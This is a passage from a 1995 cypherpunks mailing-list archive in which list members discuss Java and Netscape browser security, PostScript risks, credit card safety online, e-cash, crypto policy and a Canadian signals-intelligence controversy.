: way to enable that is to use a signed class loader.  When a trusted
: applet is loaded, then the applet could be granted permission to do
: some of the things they are prevented from doing by default.
: 
: The goal is to ensure that untrusted applets can't steal or damage
: information on a computer running a Java-enabled browser.  Later, we can
: allow trusted applets to do things that untrusted applets are not allowed to
: do.  Since an implementation bug in a trusted applet could open a loophole
: that could be exploited by an untrusted applet, design matters.
:...

Similarly, if your HotJava allows an insecure Postscript implementation
to interpret postscript files, you're still beat.

I do think that this response by Sun, regardless of the technical merits
of the particulars, demonstrates a desire to improve protection and a
willingness to listen.  My compliments for that.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 15 Nov 95 08:50:29 PST
To: Howard Melman <melman@osf.org>
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511151447.AA10433@absolut.osf.org.osf.org>
Message-ID: <Pine.HPP.3.91.951115112428.20058C-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain



This may be a stupidly obvious question but..... 
We could argue until the cows come home, hell freezes over or the Cubs win
the World Series, whatever comes first ;-) about whether giving your credit
card number to a waiter or an 800 # clerk is any more or less secure than
transmitting it encrypted or clear text over a data link.

However, this misses a very large point.  The reason I will give my 
credit number to a clerk is that the bank/credit card consortium will
indemnify me against losses from fraudulent use of my card. Tearing up your
carbons is more to protect the bank than it is to protect you. The risk to
*me* is virtually zero if I am a good bank customer.  

I have seen no such statement from the Visa/MasterCard/bank consortiums
regarding who is at risk if my card number is stolen and used in cyberspace.
When I get a written indemnification from them stating clearly that 
using my credit card in cyberspace is no different from using it in a local
restaurant, then I see no risk to the user in using the card in cyberspace.

The risk to the bank and merchant.......Now that is a different matter.
Credit card usage on the net will never take off until this issue is
solved to the satisfaction of the bank and the user.  Until this happens
arguing this issue is like arguing about how many angels can fit on the 
head of a pin.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

 On Wed, 15 Nov 1995, Howard Melman wrote:

> 
> 
> On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:
> 
> > attempts to get secure credit card number transfer on the
> > internet are not an end in themselves. they are the first
> > steps toward an entirely new transaction system. those who
> > see a single step and criticize it as feeble in the
> > context of past systems are missing the point and
> > apparently can't think past the present nanosecond of
> > their lives.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 15 Nov 95 09:00:13 PST
To: Simon Spero <cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
In-Reply-To: <Pine.SOL.3.91.951114203506.18220A-100000@chivalry>
Message-ID: <9511151659.AA03934@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>No. What Phil is saying is that the magnetic strip contains an extra 
>group of digits which are only available when the stripe is read, and not 
>when the card is used for CNP. 

The extra digits I was referring to are the ones on the front of the card 
but not embossed.

Credit card data formats are available in an issue of phrack. There is
also an article on credit card abuse "safe and easy carding by VaxBuster".
VaxBuster is I believe currently living in a secured community somewhere
in Texas making little ones out of big ones.

	Phill

PS Simon is right about Blum Blum Shub, note that there is a new PRNG
available called Pew, Pew, Barley, McGrew.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 15 Nov 95 20:29:08 PST
To: perry@piermont.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AABCD6.5E6A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release.  Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting.  Netscape has been shipping the fixed
> > applet security model for over a month (since 2.0Beta1), and
> > Netscape and Sun continue to cooperate and work closely on applet
> > security issues.
> 
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like. I know, Jeff, that
> it's all done by different groups -- but the Java stuff I've run in
> 2.0beta2 is so weirdly different than the supposedly compatible stuff
> I've run under HotJava -- especially when it comes to crashing (and it
> HAS crashed on me) that I have serious worries about the security of
> the thing. I'd say the quality looks very much like an alpha release,
> not "beta". I don't want to turn this to Javapunks so I won't say more
> on this topic any time soon -- it's already been beaten into the
> ground.

  The version of Java in Netscape is not compatible with the version of
Java in the summer release of HotJava.  There were incompatible changes
made by Sun between their alpha (summer HotJava) and beta (Netscape 2.0
and Sun's JDK Beta).  As I understand the situation, applets that were
written for HotJava must be ported to the beta API for them to work
with more recent releases of Java.

  I would agree that Java is not as stable as the rest of the 2.0 release.
That is one reason why we have added a preference to disable Java.
If you are worried about it you can just switch it off.  I argued for
this switch because I knew that there would be people who would not
want to trust Java until it had some mileage on it.

  The early beta releases we do are mostly intended for developers and
early adopters who want early access to the new features.  We had a
great leap in quality between B1 and B2, and I expect that to continue
with the future betas.  

	--Jeff  

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 15 Nov 95 20:29:00 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <v02120d05acd0346e6c23@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.951115201837.2421C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Although Private Idaho will always remain free, to encourage Ecash use, 
my Web page will support "donations."  The initial merchant list sounds 
like it's going to be a subset of this list.  Time to go add the Mark 
Twain links to the page.  This is going to be fun...

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 15 Nov 95 18:53:47 PST
To: ses@tipper.oit.unc.edu
Subject: Re: credit card conventional wisdom (fwd)
Message-ID: <01HXOR9P3BB48WY0P1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Simon Spero <ses@tipper.oit.unc.edu>

The printed digits above the embossed account number are the first four
digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
to discourage re-embossing of the card with another account number.
----------------------
	You may be interested in knowing that this appears to vary depending
on the card issuer (or possibly on when the card was issued). My MasterCard
(from USAA) has no such printed digits; instead, the entire account number
is on the back of the card, plus 3 (I would guess check) digits.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 16 Nov 95 09:20:45 PST
To: cypherpunks@toad.com
Subject: NID_otp
Message-ID: <199511161720.MAA17416@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-16-95. Washrag:


   "Pentagon Gaining Turf From the CIA."

      Pentagon agencies and officials are set to play a
      greater role than before in supervising key intelligence
      operations including doctoring spy satellite photos,
      and recruiting then ignoring bumbling agents overseas.
      There's even a proposal in Congress to create a new,
      national intelligence director hiding out in the Office
      of the President (OTP), and supervising nulls with
      equal job-fears at the CIA and Pentagon.

      Sen. Bob Kerrey worries about the trend because "in the
      world of the future, more and more secret garbage would
      not feed my national interest." He cited Deutch's proposed
      consolidation of intelligence imagery analysis in a new
      Pentagon-run advert agency, which would swallow up the CIA's
      National Photo Interpretation Center along with the
      Defense Department-based Central Exaggeration Office and
      Defense Entrapping Agency. "Clinton, Moynihan and Specter
      are hogs for slop," Kerrey spat, "I want my rep fattened."


   NID_otp  (8 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 16 Nov 95 16:15:04 PST
To: cypherpunks@toad.com
Subject: Need to get your shop setup before friday?
Message-ID: <199511170008.QAA29573@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	If you need to get your shop setup before Friday, and don't
have the time yourself to figure out how to install the CGI things,
etc.  Community ConneXion can do it for you, at our standard CGI web
design rate. Call me at the number below, or page 510-321-1014.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 16 Nov 95 16:09:54 PST
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511170006.AA17075@all.net>
MIME-Version: 1.0
Content-Type: text


> Perhaps Dr. Fred fails to realise that some people *aren't* speaking
> for their entire company every time they write e-mail. [see fc.all.net--
> i always enjoy pronouncing that nearly phonetically]

I thought all Netscape and Sun communications come from their PR
departments.  You can't have it both ways.  Your position seems to be:

	If employees make statements that work out, it's OK.
	If their statements don't work out, you disclaim them.

This is baloney.  When you work for Netscape or Sun and speak about your
company's products, you are representing the company whether you
disclaim it or not.

...
> To have some slight cpunks relevance, I will weigh in on the side of
> `It's not X's responsibility to ensure that Y's software isn't broken.'
> {for all X, Y in {software developers}} Why? For the same reason that
> I'm not generally held accountable for, say, Gary Jeffer's opinions
> or Tim May's: because I don't have any control over them.

	So your claim is that Unix is perfectly secure for networking,
because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
and all those other add-on software pieces, if your users act perfectly
and nobody ever makes a mistake, you are safe from known attacks. 

	I think this is ridiculous.

	When sendmail has a bug, most Unix systems become insecure. 
When syslog has a bug, most Unix systems become insecure.  These are
commonly called Unix insecurities.

	When Postscript allows writing to files, most Web browsers
become insecure - including Netscape, including HotJava.  If the only
commonly available postscript programs are insecure, the products have
hooks designed to allow postscript to be used automatically to interpret
programs from over the net, and servers commonly provide information in
postscript format, the enabling technology (i.e., Netscape and Hot Java)
is responsible for the vulnerability.

	If it only worked under Unix, people would call it a Unix
vulnerability, but since it works under Windows and OS/2 and every other
system that runs Netscape or HotJava, it is a Netscape and HotJava
vulnerability.

	I would also call it a postscript vulnerability, EXCEPT that
HotJava and Netscape ALSO provide hooks to command interpreters and
other insecure software, so we can't just pin it on the add-ons.  The
common thread is the Web browser, and that's where the blame belongs. 
Not with the millions of users, not with the tens of add-ons, not with
the various operating environments, but with the one common thread, the
Web browser.


-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 16 Nov 95 19:50:52 PST
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <Pine.HPP.3.91.951117024147.26779A-100000@cor.sos.sll.se>
Message-ID: <9511170350.AA29590@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>How about this:
>________________________________________________________________________
>9. Subject to legal privileges or protection, most legal systems permit
>investigating authorities to order persons to hand over objects under
>their control that are required to serve as evidence. In a parallel
>fashion, provisions should be made for the power to order persons to
>submit any specified data under their control in a computer system in the
>form required by the investigating authority.
>________________________________________________________________________

>Is this 'what we would want'? It clearly means that one can be ordered
>to reveal the password to encrypted data and punished by law if one
>refuses. Suppose they suspect you of being a child pornographer and
>get a court order to search your encrypted system. You know you are
>innocent. Is it acceptable to put you in jail for not giving them access
>to your encrypted, very personal diary (in which you describe in detail
>your sexual encounters with the wife of the Chief of Police)?

Well if you want to eliminate all search and seizure powers of the courts
then that is a valid point to make. The point of the directive though
is to point out to the legislatures that they have to consider their
position on this one.

I'm not particularly keen on the idea that we should hope that the 
legislatures let this type of change happen by default. They are not 
going to do that, they may let things slide but they then are more
likely to do something reactionary when they realise they have been
had. And that reaction is likely to be anal.


>_______________________________________________________________________
>14. Measures should be considered to minimise the negative effects of the
>use of cryptography on the investigation of criminal offenses, without
>affecting its legitimate use more than is strictly necessary.
>_______________________________________________________________________

>Is this really just a toothless statement to give to the French?

Parse it carefully, its implications depend heavily on the interpretation
of "legitimate use" and "strictly necessary". 

Point is that it is not a directive to implement a Euro-Clipper program
which is what various spin doctors were claiming. The deputy director of the
NSA tried to use it as evidence to support his claim that other countries
are following the US position.

Mind you I may be wrong about the French. Someone suggested today that
they would prefer there to be no debate on crypto because they don't
want people to find out what they are up to.


		Phill


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 16 Nov 95 20:21:33 PST
To: schampeo@imonics.com
Subject: Re: Java & Netscape security  [NOISE]
Message-ID: <9511170418.AA18604@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


><plonk>! I'm so tired of listening to this no-researching,
...

Why do people seem to insist on telling the list when they killfile
someone?  Overall, isn't that just adding to the crap one has to
sift through?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 16 Nov 95 23:36:09 PST
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
Message-ID: <199511170734.XAA12538@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 AM 11/16/95 -0800, Marianne Mueller wrote:

>I think it would be great if either of these two things were to magically
>happen:
>
>	1) people would stop putting postscript docs on web pages
>	because it's the wrong technology for WWW - it wastes
>	bandwidth - it's hard to view & hence often ugly - everyone
>	just prints it out anyway and then complains because there
>	is no one "standard" implementation of postscript printing
>	worldwide and there are dozens of minor problems

Postscript is often a better model for applications like WWW -
certainly more flexible than GIFs, and often smaller, for pictures
that are composed of drawings or text-like objects rather than
scanned photographs.  You don't have to worry about resolution
differences, jaggies, and ugliness - just compatibility and
security and memory consumption :-).  It's somewhat the difference
between X and NeWS.  I seldom print Postscript documents out;
I view them with Ghostscript, though lack of a non-HP printer 
affects this...   Viewing java docs on line, with the equations
written as GIFs (without even an alternate text eqn or fortran form)
is much tougher.

>	2) someone could implement a secure postscript previewer
>	(whatever that means!) 
Yep.  If you've got something that limits itself to making marks
on virtual paper and modifying memory in well-defined areas,
that's probably good enough.  I'm hoping Java can do much the same job.

...
> If you have data you can't
>bear to lose, be sure to practice safe computing.  Perform backups
>regularly, and use judgement about which interpreters and executable
>programs you allow to run on your PC.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 17 Nov 95 08:58:54 PST
To: michael shiplett <walrus@ans.net>
Subject: Re: SA: Confidential Communication on the Internet
In-Reply-To: <199511171627.LAA17236@fuseki.aa.ans.net>
Message-ID: <Pine.SUN.3.90.951117105324.3208A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


No I think you did. The main point I guess was that their system accomplished
authentication, as well as privacy. But like I said, lite on the technical 
side. And I agree, it spent more time talking about what is encryption,
public keys exchange, and certificates, than answering what is different in 
their system than any of the others out there.

 On Fri, 17 Nov 1995, michael shiplett wrote:

>   This seemed to be a duplication of an X.509 certificate hierarchy:
> ``Hey, I don't know who you are but you have a seals which go back to
> a CA I trust.'' In this respect the information seemed unworthy of an
> article in SA.
> 
> Perhaps I did not read the article closely enough?
> 
> michael
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fluffy@shout.net (Chris Stillson)
Date: Fri, 17 Nov 95 09:21:33 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Crypto++ port for Macintosh
Message-ID: <199511171701.LAA30608@duracef.shout.net>
MIME-Version: 1.0
Content-Type: text/plain


I have started to port your crypto++ libraries to mac, using
metrowerks.  I was just wondering if you would like a copy
of it when I'm finished?

All in all, a very interesting set of classes.

Chris






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 17 Nov 95 08:56:00 PST
To: Robert Hettinga <tcmay@got.net>
Subject: Re: e$: Mandarins, Lifers, and Talents
In-Reply-To: <v02120d0eacd1b471dc1d@[199.0.65.105]>
Message-ID: <Pine.BSD.3.91.951117162855.9415B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   one point to add to the discussion of pioneers, "evangelists" and 
"prophets" in this thread:

   1.  they were all ahead of the curve --yes, they were visionaries. 
       almost all were pushed aside as it became a "business."

   2.  most were pioneers: a specific example is Bob Norris who walked
       out of a Fairchild board meeting after being rejected for his 
       eighth try at replacing Germanium because the first seven had
       failed. A couple of VCs, among them Arthur Rock and Bob Perring
       said: "...we believe you, let's try silicon..." and we have Intel.  

       But, who drives Intel today? --Grove, who is labelled as the
       founder.  Grove made the _business_ -the brains have been 
       forgotten. Norris was the darling of the VCs for a couple years
       until they figured he couldn't spot a _financial_ success.

This same scenario was repeated at Apple, and hundreds of others. Grove
was an exception to the rule that the startup management, quite often
including developers, is replaced by plain vanilla suits. Why even the
evangelistic and prophetical developers?  --because they don't deviate
from their vision to comply with the solely profit oriented modes of the
new marketeers. 

I look at it this way: our nation runs on _money_, whether we like it or 
not (I don't). Money for the sake of money is evil money as it gives 
nothing in return, particularly when everything is to be produced as 
cheaply as possible for more profit to the money folks.

Reminds me of two excellent quotes from John Ruskin:

 "He who buys for price alone is this man's lawful prey."

 "The price of oats is significantly lower after processing by the horse." 

I write code because I enjoy it -even if it is addictive.

	flick

-------------------------------------------------------------------------
On Thu, 16 Nov 1995, Robert Hettinga wrote:

> >It really did not happen because of cheerleaders. This is a recurring
> >belief of mine, notably in my occasional interactions with the nanotech
> >community, as a few members of this list can attest to. The "Rah, Rah"s--no
> >pun intended--play a minor role in adoption of new products and
> >technologies.
> 
> Tim, you can't tell me that there weren't people who were just plain fired
> up about the prospects for any really serious technology. Where are you
> living, the Gernsback Continuum? Tim, those "cheerleaders" are the ones who
> either get fired up to do something themselves, or if they can't, they get
> people either fired up to buy stuff, or fired up to build stuff. Howard
> Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
> passion is strong crypto and cryptoanarchy. Mine is this geodesic market
> stuff...
> 
> 
> >One argument I am never persuaded by is the hackerish "Feh." (Does anybody
> >but hackers use this strange word?)
> 
> Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from
> electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
> knows all about the MIT Model Railroading Club...
> 
> >In any case, I'm not interested in "doing better than that." My support for
> >Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
> >Money, or E-Purse, or Digibux, or whatever, well, I'm not a merchant. Just
> >as one could study flight, to use Bob's example, without operating a
> >passenger service or a flying school, so one can be interested in digital
> >cash without "opening an account."
> 
> Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
> make something happen, for that matter.
> 
> 
> >Ah, but I never claimed otherwise (perhaps this is what you mean by "your
> >nonexistant point"). My point was only that digital cash will happen mostly
> >when it fills a need, or is accepted by customers, not by cheerleading and
> >by urging people on this list to be pioneers.
> 
> Cart before the horse, Tim. Most of the new people (say, for 2 years at
> least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
> who are there primarily because 90% (!) of the traffic on it is my
> e$-filtered cross-posts from cypherpunks, and I don't know how many are
> over here because they like their whiskey neat. Those people are so fired
> up, they will find a need, or *create* one, if they have to.
> 
> >The theories about mandarins, lifers, and talents I'll discuss at another
> >time, maybe. All I'll say is that I think it's too simple a categorization.
> >Maybe it's a Boston viewpoint.
> 
> Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
> Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
> Boston. Never knew I was one until you told me...
> 
> >The folks I've worked with over the years
> >bear almost no resemblance to any of these categories.
> 
> Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock
> *down*...)
> 
> >In any case, people
> >will start using digital cash if and when it fulfills some need, or some
> >need they never knew they had, gets stimulated.
> 
> Agreed.
> 
> >
> >On a personal note--which is weird, since 1000 or more people may be
> >reading this message, though most probably haven't read this far--I think
> >it best not to get too emotionally attached to some particular outcome in
> >the introduction of a new technology.
> 
> I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
> It just seems to me, that if you want to get involved in this flying stuff,
> here's a plane that flies, even if its elevators are stuck on the front.
> Learn to fly now, and be able to fly the new stuff as it becomes available.
> If you want to fly, that is. Some people then couldn't help it. They *had*
> to do it. That's what's happening here, Tim.
> 
> >I've seen many "prophets" wailing to the world that their
> >visions _deserve_ success.
> 
> Not here Tim. I believe you might be projecting, or something. I just want
> to sell stuff for cash on the net. Then, I want to surfact the financial
> markets into little tiny pieces...
> 
> >The technologies which hit the right chord rarely need, or benefit from,
> >the "evangelists" and "cheerleaders." The Macintosh did not need Guy Kawasaki or
> >any of the other so-called evangelists to succeed. The microprocessor did
> >not need evangelists. The airplane did not. The VCR did not. The cellular phone
> >did not.
> 
> I don't believe that for a minute, and on reflection, you probably don't
> either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
> Think about, oh, the Sony guy, whatever his name is, Morita. The people who
> built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
> What about the *entrepreneur's* reality distortion field. I bet you've seen
> more than a few, and probably more than a few who were right, or you
> wouldn't be thrashing your Mac on the net and clipping coupons...
> 
> 
> >And I can think immediately of several
> >technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
> >Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
>                                                                 ^^^^^
> >enthusiasts--but in which progress has been stalled or proceeded along
> ^^^^^^^^^^^^
> >different paths for different reasons.
> 
> I resemble that remark. Sure, Tim some of them didn't make it. But for
> every one of those (strange you should mention Jobs, right after I mention
> the reality distortion field, and don't count him out yet, rumor has it
> Ellison wants him to run Apple when Oracle buys it, god help us all), there
> are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
> think of are germans, uh, okay, Bill Gates.
> 
> >This is a very interesting area for me, and I used to write extensively
> >about it. Nick Szabo and I had several debates about this, a couple of
> >years ago. However, no time now to discuss the full implications here.
> 
> Having been hammered by Nick myself, once or twice, I think I understand this...
> 
> So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
> enthusiastic about all this on my account, and puts up the king-hell,
> world-beater, financial-cryptography-killer-ap that's cool by me.
> Otherwise, it's only bandwidth, which I've wasted enough on for this
> thread. If you want to make the rubble bounce, go for it.
> 
> Besides, I usually stay in my cage, these days. Which is where I'm going to
> go and lurk for another month or so...
> 
> Cheers,
> Bob Hettinga
> 
> PS: Feh
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional." --Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 17 Nov 95 19:01:53 PST
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
Message-ID: <199511180300.TAA16642@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here (the real one) ...

On Thu, 16 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> Hmm, actually the news tape is reading a little strange here in Canada.
> Not AP, or REUTERS, but simply the Canadian Press newswire.

         [long exercise in character assassination deleted]

I think that this "writer" who felt that it was desirable to attach MY
name to this drivel deserves a good flogging. 

Clearly, someone is spending WAY too much time on //WIRES on the Dow Jones
News Retrieval Service, or wherever else they get to Canadian Press news
stories.  The matter Mr. mystery-writer detailed is in fact a Canadian
matter, a domestic affair, which has no concern to an international
audience. 

Taking three successive news stories from three days ... (press stories,
I've since pulled for my own reference) and pasting them together to
indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 

> And all these stories ... coincidentally ... broke back to back.
> 
> It's almost as though the country is disinfecting itself, or has taken 
> one particularly powerful laxative.

I don't see this at all.  The CSE story has no connection to anything 
else which is occurring domestically nor internationally.  No relationship 
whatsoever.

> But the CSE story is really, really smelly.  The worst of the whole lot. 
> 
> I think that there might be more to this than appears on the surface. 
> Maybe filling in some details might help our friends on this list.
> 
> You listening, Perry???

I think Perry has far more interesting fish to fry, than to worry about 
domestic Canadian affairs, and what occurs within another sovereign's 
borders.  

Whether or not Canada has collected and analyzed communications traffic on
the activities of foreign states, corporations, and people is simply a
Canadian matter.  

It's OUR affair.

> "And if, in fact, there has been illegal activity going on, we'll want to 
> deal with that in as public a way as possible," said Sheila Copps.
> 
> The Mexican government has presented a diplomatic note to Canada
> expressing "surprise and concern" over the report that it was spied on
> during the North American free-trade talks. 
> 
> South Korea is looking into the matter as well. 

Airing dirty laundry like this serves no purpose, whatsoever.  It's not
productive and is not focused to any particular policy objective. 

And in any event, the Canadian Communications Security Establishment
does serve up "sloppy seconds" (as some other poster named them) under
intelligence sharing agreements with its counterparts in the United
States, Britain, Australia, and New Zealand.  

In the same vein, it also is a recipient of same.  These agreements and
working relationships have historically benefitted all. 

> And I guess ... that's all of the news that I've got to this hour.  Except
> for one brief note, that Prime Minister Chretien tried to call the States,
> but the Government shutdown meant that his call couldn't get through.  
> I think he tried to call NASA.

Fella ... whoever you are ... please get your stories straight.

The Prime Minister of Canada was trying to call NASA, not the NSA.  There IS 
a significant difference between the two, as near anyone on this list can 
attest.

The Prime Minister was attempting to contact Canadian astronaut Chris
Hadfield, who is on the space shuttle Atlantis which is presently docked
with the Russian space station Mir.  

He wasn't trying to call the NSA ...  it was the NASA. 

In fact, the Prime Minister's comments from the Commonwealth meeting in
New Zealand were most clear.  "This is an organization that works within
the law of Canada.  They do not report to me on a daily basis and I cannot
make any comments on if they are spying on anybody, I don't know.  But
they have a mandate to check a few things around the world." 

Please try reading the list for a bit, before posting and confusing
people. 

> Speaking personally, I just think that something is a bit fishy. I mean 
> "Jane Shorten" is a nym if I ever heard one ... probably married to
> "Dick Lengthen" or something.  

Your juvenile antics deserve no further comment.

> I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE 
> did??  Made snowmen and skated on the Rideau Canal??

I don't think that this is relevant.

And btw, it's giggle test ... it's not "GiGGle TesT".  I learned how to 
use a shift key long, long ago.  You oughta try it some time.

> The agency IS obligated to destroy information about Canadians it scoops 
> up in its electronic net.  A rare exception might be a phone call 
> describing a terrorist plot, but that would truly be exceptional, I think.
> 
> I mean its not like one big fishing expedition. 

The CSE does not target its own citizens and has agreements with other 
agencies that they will not either.  If someone's communication is 
accidentally caught in the net, the CSE is obligated to destroy the 
information except in the rarest of circumstances. (i.e. foreign terrorists)

> And that's the fleshed out version of the story.

Your fleshed out story was very interesting ... especially the way you 
tied things together.  Did they teach you to do that type of thing 
somewhere??

But it's not appropriate for this list.  And this is a Canadian matter.

> I'm just sorry that our Prime Minister is in such a bad position because 
> of the timing of this "Jane Shorten's" revelations.  She also revealed 
> that Canada spied on Japan.
> 
> To think ... Canadian Prime Minister Chretien is a guest of the Japanese
> people today.  Talk about some awkward moments.  I mean, what on earth do
> you talk about?? 
> 
> George Bush and Sushi??

Cute ... really.  I'm certainly amused.  As I'm certain were all the 
Americans on this International list.  George Bush, simply had jet lag, 
when he threw up at Japan.  What does he have to do with anything?

Canada and Japan have a great deal to speak about.  Canada might even be a
good friend and help the US with the Okinawa problem.  Who knows?  We
never know how these things play. 

I really don't think that Canada will be marginalized by this, and I 
certainly hope that neither will I.  Your antics, notwithstanding, and 
your imagination of "tying things together" serves no purpose.

The people on this list can filter fact from fiction.

> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                    ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

Like, I said ... very, very cute.

There's only one problem, mr mystery-writer, I only have one or two
interests on this list.  And politics is not generally one of them.  My
interests are simply and in order of personal importance, 

     - removing known Security Holes in existing software or removing the
       software, (e.g.  Netscape Navigator and Java), and

     - finding some secure way to implement functional international
       commerce via the Internet. Probably, something ECU based. 

Security and E-cash. 

Your attempt to create some type of political "brownie points" or desire
to gain some attention or notoriety simply distracts me from addressing
the real issues, and addressing my backed-up email. 

MALICE DE MONSTEROUS wasn't enough for you??  

Please don't bother with any reply.  None is expected.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Fri, 17 Nov 95 18:40:08 PST
To: cypherpunks@toad.com
Subject: Re: No Privacy Right in Indonesia ? (fwd)
Message-ID: <m0tGdBP-0005JZC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



I spent several minutes resisting a followup, but if people are going to
discuss, I have to cave...

Forwarded message:
> 
